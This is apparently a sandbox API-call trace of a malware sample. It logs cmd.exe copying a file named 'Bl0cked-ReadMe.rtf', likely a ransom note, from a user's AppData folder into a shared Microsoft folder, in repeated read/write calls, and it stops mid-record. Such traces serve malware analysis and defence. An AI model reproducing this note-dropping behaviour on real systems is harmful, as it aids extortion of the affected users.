GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.866] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f708, lpFilePart=0x12f704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f704*="Desktop") returned 0x18 [0193.866] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f484 | out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f484 | out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f484 | out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0193.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0193.866] GetEnvironmentStringsW () returned 0x202ae0* [0193.867] FreeEnvironmentStringsW (penv=0x202ae0) returned 1 [0193.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.867] GetConsoleOutputCP () returned 0x1b5 [0193.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.867] GetUserDefaultLCID () returned 0x409 [0193.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f848, cchData=128 | out: lpLCData="0") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f848, cchData=128 | out: lpLCData="0") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f848, cchData=128 | out: lpLCData="1") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0193.868] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.869] GetConsoleTitleW (in: lpConsoleTitle=0x1f08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0193.870] _wcsicmp (_String1="type", _String2=")") returned 75 [0193.870] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0193.870] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0193.870] _wcsicmp (_String1="IF", _String2="type") returned -11 [0193.870] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0193.870] _wcsicmp (_String1="REM", _String2="type") returned -2 [0193.870] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0193.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.873] GetFileType (hFile=0x7) returned 0x2 [0193.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f740 | out: lpMode=0x12f740) returned 1 [0193.874] _dup (_FileHandle=1) returned 3 [0193.874] _close (_FileHandle=1) returned 0 [0193.874] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0193.874] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~2\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f710, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0193.875] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0193.875] GetConsoleTitleW (in: lpConsoleTitle=0x12f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.876] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0193.876] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0193.876] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0193.876] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0193.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.877] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12f0a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f0a4) returned 0x1f0e58 [0193.877] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0193.877] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0193.877] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0193.877] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dfb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0193.877] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0193.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.877] GetFileType (hFile=0x54) returned 0x1 [0193.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12e008 | out: lpFileSizeHigh=0x12e008*=0x0) returned 0x1632 [0193.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] GetFileType (hFile=0x4c) returned 0x1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] GetFileType (hFile=0x4c) returned 0x1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] GetFileType (hFile=0x4c) returned 0x1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] GetFileType (hFile=0x4c) returned 0x1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.880] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.881] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.882] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.883] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] GetFileType (hFile=0x4c) returned 0x1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.885] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.885] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, 